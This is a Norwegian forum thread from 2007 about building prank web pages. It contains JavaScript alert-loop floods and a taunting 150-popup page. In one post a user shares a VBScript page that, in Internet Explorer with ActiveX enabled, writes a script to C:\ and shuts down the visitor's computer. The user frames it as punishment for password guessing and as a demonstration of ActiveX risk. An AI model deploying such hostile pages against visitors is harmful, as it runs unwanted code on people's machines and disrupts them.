turak Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 Jeg Lurer På Hvordan Du Lager Sider Som DETTE (ikke trykk her hvis du har de travelt, med mindre du bare bruker ctrl+alt+delete) dette har litt med programmering og gjøre.. TROR JEG, så jeg satset dette... ganske enkelt vil jeg vite hvordan du får irriterende beskjedre som dette til og poppe opp gjentate ganger ....
Dj_Offset Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 Ja, dette er programmering. Du må bruke Javascript, det finnes en egen Javascript seksjon i dette forumet.
turak Skrevet 3. oktober 2007 Forfatter Skrevet 3. oktober 2007 Ja, dette er programmering.Du må bruke Javascript, det finnes en egen Javascript seksjon i dette forumet. 9626219[/snapback] jeg har ikke mye greier på programmering så jeg måtte sette den her :/
loathsome Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 Tja, du kan jo kjøre en enkel løkke i JS. Eller du kan lage tusen "alert()"-bokser. Her er et kjapt, jævla irriterende eksempel <script type="text/javascript"> function intenseFuck(){ for (var x = 1; x <= 666; x++) { alert('Hahahahah lol k.'); } } </script> <body onload="intenseFuck();"></body> Ellers så snekret jeg sammen denne for år og dager siden. (Brukte den når en bruker av en webside snek seg inn hvor han ikke skulle (error 403)) Men mitt protips: Ikke lag slike sider.
j000rn Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 Ellers så snekret jeg sammen denne for år og dager siden. (Brukte den når en bruker av en webside snek seg inn hvor han ikke skulle (error 403)) 9627325[/snapback] Hva er poenget? Vanlige folk som kommer til siden fordi de paster inn feil link eller en av linkene dine peker feil gjør at de blir ekstremt irriterte. "Hackere" har skrudd av javascript eller bruker ikke en vanlig browser. Så dette har ingen hensikt til å avskrekke de slemme, men kan ødelegge hele brukeropplevelsen for de som du faktisk har lyst til at skal se på siden din....
loathsome Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 (endret) Ingen hensikt i det hele tatt Legg merke til at jeg skrev "for år og dager siden." - noe man kan se på kildekoden også. Endret 3. oktober 2007 av loathsome
turak Skrevet 3. oktober 2007 Forfatter Skrevet 3. oktober 2007 jeg tenkte jo på dette som kødd med kompiser jeg har ikke tenkt og skape jævel skap ^^ ville bare ha en enkel guide <3
backup Skrevet 3. oktober 2007 Skrevet 3. oktober 2007 Det kan jo være brukbart som en takk for sist da. Ta en passordbeskyttet webside som en fyr prøver en form av brute force på. Et script på server mottar sendt passord, tester mot riktig passord og hvis feil, sender tilbake meldingen feil passord, prøv på nytt. La oss si dette gjøres fem ganger hvis feil passord, men sjette gangen feil passord, da sendes et html-dokument med et javascript med en alert-boks som går i en uendelig loop, for eksempel. Dermed stoppes også fyrens brute force.
Mr.Garibaldi Skrevet 4. oktober 2007 Skrevet 4. oktober 2007 (endret) Det er vel mer sannsynlig at en som evt. prøver å brute force en side ikke sitter og gjør dette i en nettleser, men har laget/bruker ett program som gjør dette for han. Og i så fall er det lite sannsynlig at en slik side ville ha noen som helst effekt... [EDIT] Med mindre du snakker om dataukyndige "venner" som forsøker å komme seg inn på en passordbeskyttet side ved å forsøke alle passord de tror du kan ha brukt.. Men det vil jo være like enkelt å unngå ved å bruke ett langt passord.... [/EDIT] Endret 4. oktober 2007 av Mr.Garibaldi
backup Skrevet 4. oktober 2007 Skrevet 4. oktober 2007 Er enig i at egentlige hackere ikke sitter med vanlige webbrowsere, tenkte nok på disse dataukyndige "vennene" ja, men lange passord er vel en ulempe for brukerne i forhold til kortere passord, men uansett passordets lengde, er det vel en fordel å kunne stoppe denne hackinga fra disse "vennene" etter for eksempel fem forsøk. Dessuten smaker det jo godt å vite at dem ganske fort får seg en som en smekk over fingrene skulle jeg tro, hihi.
turak Skrevet 19. oktober 2007 Forfatter Skrevet 19. oktober 2007 er jo ikke stort være en at du lager et virus (dokker gutta kan vel de), som slår tilbake etter Xantall passord er prøvd de vil jo være n jævlig enkelt måtte (uten om den delen med virus)... en trojaner, eller noe som bare skrur av PC ;P DE vil være mer irriterende en alle andre .... men dette er vel mere for og forhindre hackere... litt jævlig hvis noen vanlige personer får denne (jeg kan ikke no særlig om dette, men så var jeg hovedsakelig ute etter MORO sider) men hvis du vil lagen en ''irriterende side'', må du skrive et program 100 ganger med EN litten vri (hvis du vil at melding skal være aneledes PR melding ?
BigJackW Skrevet 19. oktober 2007 Skrevet 19. oktober 2007 Kildekoden: <script>alert ('Hei og velkommen!')</SCRIPT> <script>alert ('Håper du vil like deg her.')</SCRIPT> <script>alert ('Etter noen klikk vil du få en overraskelse.')</SCRIPT> <script>alert ('Så mens vi venter, har du det bra?')</SCRIPT> <script>alert ('Håper ihvertfall du har det bra.')</SCRIPT> <script>alert ('Ja, jeg har det bra, takk som spør.')</SCRIPT> <script>alert ('Men du spurte ikke, gjorde du?')</SCRIPT> <script>alert ('Du bryr deg vel egentlig ikke i det hele tatt du?')</SCRIPT> <script>alert ('Du tror vel denne siden lagde seg selv du?')</SCRIPT> <script>alert ('Åh nei du.. En lys levende person lagde denne siden...')</SCRIPT> <script>alert ('En med mål, drømmer, følelser og et liv.')</SCRIPT> <script>alert ('Men det driter du i..')</SCRIPT> <script>alert ('Du er ekstremt uhøflig!')</SCRIPT> <script>alert ('Siden du er så uhøflig, kan vel jeg være litt irriterende?')</SCRIPT> <script>alert ('Du vet jeg har full kontroll over disse boksene, ikke sant?')</script> <script>alert ('Du vil bli værende her så lenge boksene er her..')</SCRIPT> <script>alert ('Bare prøv..')</SCRIPT> <script>alert ('Nope.. Å trykke på stopp funker ikke..')</SCRIPT> <script>alert ('Ingenting funker!!')</SCRIPT> <script>alert ('Muahahahaha!')</SCRIPT> <script>alert ('Tenk nå om dette vil fortsette i all evighet?')</SCRIPT> <script>alert ('Boks etter boks etter boks etter boks...')</SCRIPT> <script>alert ('Så jeg tipper vi blir værende her ei stund..')</SCRIPT> <script>alert ('Hvorfor ikke ha en liten dialog mens vi venter?')</SCRIPT> <script language=JavaScript><!-- // © Joey Kilaita, 1999. ([email protected]) // Contact above email for tech support. // Use this script freely as long as This header is included. var namePrompt = prompt("Hva heter du forresten?",""); // Between the quotes above you can put whatever text you want on the //prompt box. function dispname (namePrompt){ alert(" Hyggelig å møte deg, "+namePrompt+". Takk for at du besøker meg."); // Again, you can change the text to your liking but DO NOT change the // "+namePrompt+" text or the script will not work. } // --></SCRIPT> <script language=JavaScript><!-- {dispname(namePrompt);} //--></SCRIPT> <script>alert ('Du vet du har et merkelig navn, ikke sant?')</SCRIPT> <script>alert ('Vedder på at du blir mobbet..')</SCRIPT> <script>alert ('Hvem i sin rette forstand ville gitt ungen sin ditt navn?')</SCRIPT> <script>alert ('Ikke mine foreldre hvertfall.')</SCRIPT> <script>alert ('Kanskje dine, men ikke mine.')</SCRIPT> <script>alert ('For guds skyld.. For et navn!')</SCRIPT> <script>alert ('Var folka dine drita eller noe?')</SCRIPT> <script>alert ('Nei, jeg bare tuller med deg. ')</SCRIPT> <script>alert ('Ja, ja.. Jeg vet hva du tenker..')</SCRIPT> <script>alert ('Du har ting å gjøre')</SCRIPT> <script>alert ('Mennesker å treffe!')</SCRIPT> <script>alert ('Eller er det omvendt? hehe.')</SCRIPT> <script>alert ('Men dette er vel egentlig moro, ikke sant?')</SCRIPT> <script>alert ('Jeg syns ihvertfall det..')</SCRIPT> <script>alert ('Er du sint på meg??')</SCRIPT> <script>alert ('Dette er vel egentlig ganske irriterende, er det ikke?')</SCRIPT> <script>alert ('Men ikke legg skylden på meg!')</SCRIPT> <script>alert ('Legg skylden på personen som sendte deg denne siden...')</SCRIPT> <script>alert ('Det er den personen som vil du skal bli torturert.')</SCRIPT> <script>alert ('For dette er tortur.. Er det ikke?')</SCRIPT> <script>alert ('Tipper du begynner å bli trøtt i fingeren.')</SCRIPT> <script>alert ('klikk etter klikk etter klikk etter klikk')</SCRIPT> <script>alert ('Etter klikk etter klikk...')</SCRIPT> <script>alert ('Håper du ikke får Carpal Tunnel syndrom.')</SCRIPT> <script>alert ('Hva Carpal Tunnel syndrom er?')</SCRIPT> <script>alert ('Det blir også kalt musesyke.')</SCRIPT> <script>alert ('Ikke saksøk meg hvis du får det..')</SCRIPT> <script>alert ('Jeg vil bare nekte på det..')</SCRIPT> <script>alert ('Du kan trykke på space hvis du vil..')</SCRIPT> <script>alert ('Det gir samme effekt...')</SCRIPT> <script>alert ('Hmm.. Hva skal vi snakke om nå da?')</SCRIPT> <script language=JavaScript><!-- // © Joey Kilaita, 1999. ([email protected]) // Contact above email for tech support. // Use this script freely as long as This header is included. var namePrompt = prompt("Kom med et forslag:",""); // Between the quotes above you can put whatever text you want on the //prompt box. function dispname (namePrompt){ alert(" "+namePrompt+"?!?!? For en teit ting å snakke om!"); // Again, you can change the text to your liking but DO NOT change the // "+namePrompt+" text or the script will not work. } // --></SCRIPT> <script language=JavaScript><!-- {dispname(namePrompt);} //--></SCRIPT> <script>alert ('Er du høy eller drita eller noe slikt?')</SCRIPT> <script>alert ('Jeg mener, kom igjen!! Har hørt mye teit, men herregud..')</SCRIPT> <script>alert ('Nei, jeg bare tuller igjen.. Det var ikke så teit ')</SCRIPT> <script>alert ('Det er bare det at det er litt kjedelig å snakke om.')</SCRIPT> <script>alert ('Så.....')</SCRIPT> <script>alert ('Er du blitt trøtt og lei nå eller?')</SCRIPT> <script>alert ('Du har tross alt vært her ei stund nå...')</SCRIPT> <script>alert ('Så lang har du klikket deg gjennom 65 bokser.')</SCRIPT> <script>alert ('65 bokser! Er det ikke helt utrolig?')</SCRIPT> <script>alert ('Vet du hva mitt favoritt tall er??')</SCRIPT> <script>alert ('Gjett')</SCRIPT> <script>alert ('Nope.. Gjett igjen..')</SCRIPT> <script>alert ('Nope.. Mitt favoritt tall er 150.')</SCRIPT> <script>alert ('Er ikke det et fint og stort tall??')</SCRIPT> <script>alert ('Jeg har en idè. Skal vi prøve å nå det tallet?')</SCRIPT> <script>alert ('Hadde ikke det vært kult?')</SCRIPT> <script>alert ('Boks etter boks etter boks etter boks..')</SCRIPT> <script>alert ('Til 150! Det ville vært så rått!!')</SCRIPT> <script>alert ('Så kan du si til alle vennene dine..')</SCRIPT> <script>alert ('Jeg gikk inn på denne morosiden,')</SCRIPT> <script>alert ('og vi måtte gå gjennom 150 bokser for å komme inn..')</SCRIPT> <script>alert ('Men når jeg til slutt kom inn,')</SCRIPT> <script>alert ('Så var det den kuuleste plassen i verden...')</SCRIPT> <script>alert ('For det er en overraskelse til slutt.. Du husker det?')</SCRIPT> <script>alert ('En skikkelig rå, feit og dritkul overraskelse...')</SCRIPT> <script>alert ('kul kul kul.')</SCRIPT> <script>alert ('Kul ganger en milliard..')</SCRIPT> <script>alert ('Men for å komme dit må du gjennom 150 bokser..')</SCRIPT> <script>alert ('Skal vi prøve?')</SCRIPT> <script>alert ('Ja, vi prøver...')</SCRIPT> <script>alert ('Dette er nummer 88 forresten.')</SCRIPT> <script>alert ('89...')</SCRIPT> <script>alert ('90...')</SCRIPT> <script>alert ('91...')</SCRIPT> <script>alert ('92...')</SCRIPT> <script>alert ('93...')</SCRIPT> <script>alert ('94...')</SCRIPT> <script>alert ('Vet du hva som er skikkelig kult med disse boksene?')</SCRIPT> <script>alert ('Du må høre på alt jeg sier..')</SCRIPT> <script>alert ('Og du er også enig i alt jeg sier...')</SCRIPT> <script>alert ('For hver gang du trykker OK, så er du enig...')</SCRIPT> <script>alert ('Så hvis jeg f.eks. sier - Du er teit - så er du enig med meg.')</SCRIPT> <script>alert ('Siden du trykket på OK, så er du enig..')</SCRIPT> <script>alert ('Du stinker!')</SCRIPT> <script>alert ('Du var enig i det også, ikke sant??')</SCRIPT> <script>alert ('Hehehe.. Dette er så moro!!')</SCRIPT> <script>alert ('Nå er vi på nummer 104 forresten...')</SCRIPT> <script>alert ('46 bokser igjen..')</SCRIPT> <script>alert ('Hvis jeg var deg...')</SCRIPT> <script>alert ('Ville jeg blitt enormt forbanna på den personen som sendte meg hit..')</SCRIPT> <script>alert ('Jeg mener.. Du kaster jo bare vekk tid..')</SCRIPT> <script>alert ('Men vet du hva? Nå er det din tur..')</SCRIPT> <script>alert ('til å sende denne siden til dine (u)venner. ')</SCRIPT> <script>alert ('Nå kan du kaste bort andre sin tid')</SCRIPT> <script>alert ('Slik som jeg kastet vekk din..')</SCRIPT> <script>alert ('Bare send denne adressen til alle dine (u)venner')</SCRIPT> <script>alert ('Dette er nummer 114 forresten..')</SCRIPT> <script>alert ('Vet du hva?')</SCRIPT> <script>alert ('Jeg begynner å gå tom for ting å si...')</SCRIPT> <script>alert ('Kanskje jeg skal begynne å skrive ett ord om gangen?')</SCRIPT> <script>alert ('Denne')</SCRIPT> <script>alert ('siden')</SCRIPT> <script>alert ('irriterer')</SCRIPT> <script>alert ('deg,')</SCRIPT> <script>alert ('gjør')</SCRIPT> <script>alert ('den')</SCRIPT> <script>alert ('ikke?')</SCRIPT> <script>alert ('Dette')</SCRIPT> <script>alert ('er')</SCRIPT> <script>alert ('forresten,')</SCRIPT> <script>alert ('boks')</SCRIPT> <script>alert ('nummer')</SCRIPT> <script>alert ('130')</SCRIPT> <script>alert ('Jepp')</SCRIPT> <script>alert ('130')</SCRIPT> <script>alert ('Så nå har du bare 20 bokser igjen...')</SCRIPT> <script>alert ('Jeg tror jeg skal begynne å si farvel nå..')</SCRIPT> <script>alert ('Det har vært en lang og slitsom tur for oss begge')</SCRIPT> <script>alert ('Og jeg VET det har vært en irriterende tur for deg..')</SCRIPT> <script>alert ('Du er sikkert skikkelig forbanna!')</SCRIPT> <script>alert ('Kanskje du koker over av sinne?')</SCRIPT> <script>alert ('Kanskje du til og med holder på å bli gal?')</SCRIPT> <script>alert ('Men vet du hva? Det ligger en liten moral bak alt sammen...')</SCRIPT> <script>alert ('Er du klar?')</SCRIPT> <script>alert ('Alltid spør hvordan det går')</SCRIPT> <script>alert ('når du møter noen.')</SCRIPT> <script>alert ('Verden ville vært en bedre plass for alle')</SCRIPT> <script>alert ('Hvis vi bare var litt mer sivilisert...')</SCRIPT> <script>alert ('Så, farvel, sayonara og adios,')</SCRIPT> <script>alert ('Lykke til videre...')</SCRIPT> <script>alert ('Og vær stolt')</SCRIPT> <script>alert ('For du kom igjennom 150 bokser..')</SCRIPT> <script>alert ('Dette er nummer 150. Håper du har hatt det moro, og jeg håper du sender siden videre til dine (u)venner! Farvel!!')</SCRIPT>
Mr.Garibaldi Skrevet 19. oktober 2007 Skrevet 19. oktober 2007 Hehe, den var ganske morsom. Inspirert av Portal?
backup Skrevet 19. oktober 2007 Skrevet 19. oktober 2007 (endret) Sett at du har en passordbeskyttet webside som er veldig nyttig for en gruppe folk. Da er det klart at mange av dem vil gjøre mye for å komme inn på websiden, men du gir passordet bare til noen få av dem (dine venner). Det er også klart at siden websiden er veldig nyttig, da kan du stille krav til hvilken internet browser som skal brukes. Derfor har du laget websiden slik at den bare kommer til brukeren hvis han bruker IE der activeX og scripting er aktivert. Men siden websiden er veldig nyttig, vil nok mange av dem dataukyndige iallfall, som ikke har fått passordet, i IE forsøke å gjette seg til passordet for å få tak i websiden. Etter fem førsøk uten suksess, sender serveren så en bølleside som gir brukeren en smekk over fingrene. Her er en bøllewebside som gjør shutdown av brukerens maskin: <html> <script language = vbscript> sub window_onload Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile("c:\t.vbs", 2, True) f.WriteLine "Set OpSysSet = GetObject(""winmgmts:{(Shutdown)}//./root/cimv2"").ExecQuery(""select * from Win32_OperatingSystem where Primary=true"")" f.writeLine "for each OpSys in OpSysSet" f.writeline " OpSys.Shutdown()" f.writeline "next" f.close Set WshShell =CreateObject("WScript.Shell") Return = WshShell.Run("c:\t.vbs") end sub </script> </html> Bøllesiden krever IE med aktivert activeX og scripting. Det som skjer er ganske enkelt at scriptet først skriver et vbs-shutdown script på c:\ for så å aktivere det. For å se dette, lim hele greia inn i notepad og lagre som doffen.htm. Start så opp IE og hent inn doffen.htm, svar ja på eventuelle advarsler fra AV etc., og du får oppleve shutdown av maskina. Denne teknikken demonstrerer hvor farlig activeX kan være når man bruker IE som browser, fordi selvsagt kunne jeg ha laget et langt skumlere vbs-script en det enkle shutdown scriptet her. Endret 19. oktober 2007 av backup
turak Skrevet 19. oktober 2007 Forfatter Skrevet 19. oktober 2007 (endret) problemet er at mange IKKE bruker IE, defor må du lage flere, eller mer fleksible ideer ;P hvis ikke kommer en vem som hels wanabe hacker seg inn O_o Endret 19. oktober 2007 av turak
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå